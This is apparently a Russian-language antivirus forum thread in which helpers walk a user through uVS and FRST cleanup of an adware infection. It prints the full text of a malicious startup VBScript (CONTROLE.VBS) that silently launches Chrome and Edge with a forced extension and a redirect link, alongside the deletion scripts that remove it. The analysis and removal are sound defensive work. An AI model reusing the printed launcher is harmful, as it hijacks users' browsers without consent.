1) Сохраните  файл:  fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.

Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

2) Скопируйте текст КОДа - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !


<code>
;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
deltmp
restart
;---------command-block---------
delref {159FF5D5-55F1-4D2F-B706-767A55F77ABB}\[CLSID]
delref {1DAC0C53-7D23-4AB3-856A-B04D98CD982A}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\BITDEFENDER\BITDEFENDER SECURITY\BDWTEFF.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY TOTAL SECURITY 21.3\FFEXT\LIGHT_PLUGIN_FIREFOX\ADDON.XPI
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\BITDEFENDER\SETUPINFORMATION\CL-26-A25B50FF-7E42-4637-AA3A-4C71F23F8B3A\SETUPLAUNCHER.EXE
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PR­OFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected]
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PR­OFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE_64.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\IGDLH64.INF_AMD64_2681FC9DEDD95CD9\IGFXEXPS32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\NVDECMFTMJPEG.DLL
delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME.EXE
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\PLAYER\N­PACE_PLUGIN.DLL
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\EXTENSIO­NS\AWE\FIREFOX\ACEWEBEXTENSION_UNLISTED.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE
delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME_PROXY.EXE
delref CLIENTS2.GOOGLE.COM
delref %SystemDrive%\USERS\E8921\\LOCAL SETTINGS\APPLICATION DATA\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\[email protected]
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PR­OFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected]
apply



</code>

Kot Obormot

У вас одних ярлыков в системе 900
Более 200 ( только непроверенных ) скриптов.
И более 130 установленных программ...
--------
Нужен новый образ автозапуска в uVS
и Лог в FRST
будем удалять всё... подозрительное.

Rom Namor

Вам нужно обратиться в службу технической поддержки  ESET по адресу:  [email protected]

* На форуме нет доступа к данным - лицензий.

Сейчас часто используют легальные файлы для "атаки"
Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.

Или есть некий старый скрипт... который всю свою сознательную :)   жизнь был чист.  Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан.
-----
Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д.
Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов.
Например в каталоге с файлами 2022 года файл 2010.
Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111
Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами.
Так как файл чист - то и расширение файла - как правило стандартное.
-----
Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее.
+
Возможно файл запускается через задачу, или автозапуск.

+
Если тема по вирусам\рекламе интересна.
https://forum.esetnod32.ru/forum8/topic15785/

[QUOTE]Kot Obormot написал:
P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ [/QUOTE]

На V.T в колонке: Behavior есть весть текст скрипта.

[CODE]1988 - c:/windows/system32/cscript.exe Controle.vbs
2264 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000
2312 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Crashpad --metrics-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48 [/CODE]

+
В общем с запуском системы запускался скрипт ( CONTROLE.VBS ) > браузер получал команду и выходил на сайт ХХХ с пере-направлением на другой сайт - и там уже этот сайт мог вам показывать всякое :)

Полное имя                  C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
Имя файла                   CONTROLE.VBS
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2022-02-17 20:18 [2021-04-06] Файл был чист на момент проверки.

                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
Размер                      649 байт
Создан                      01.04.2021 в 22:38:31
Изменен                     25.03.2021 в 17:20:04
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Доп. информация             на момент обновления списка
SHA1                        58367B32AAE4C92208268A1F4B50E37862FC0162
MD5                         0278DC59F174789C3D2AA24DD835FD3A
                           
#FILE#                      On Error Resume Next


Dim WShell
Set WShell = CreateObject("WScript.Shell")

WShell.Run "chrome.exe  --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0
WShell.Run "msedge.exe  --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0

Set WShell = Nothing


On Error Goto 0

                           
Ссылки на объект            
Ссылка                      C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP
---------------
Файл известен с 2021-04-06
И V.T. показывает, что он чист.
https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a­323a00fb456420162?nocache=1
-----------------
Для удаления CONTROLE.VBS
Скопируйте текст КОДа - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !


<code>

;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\­START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
apply

restart

</code>

В Хроме есть:  Экспорт и импорт параметров.
В сети есть информация.
-------------
Есть программа Autoruns https://www.comss.ru/page.php?id=1064
чтобы программа _???_ не запускалась достаточно снять [v] в чек боксе... и всё - программа не запуститься. ( после перезапуска системы )
+ там есть строка поиска...  
Если что-то непонятно - то лучше это не трогать. :)

Здесь можно скачать _портативную версию браузера: https://www.comss.ru/page.php?id=261
Посмотрите будет ли и там эта проблема.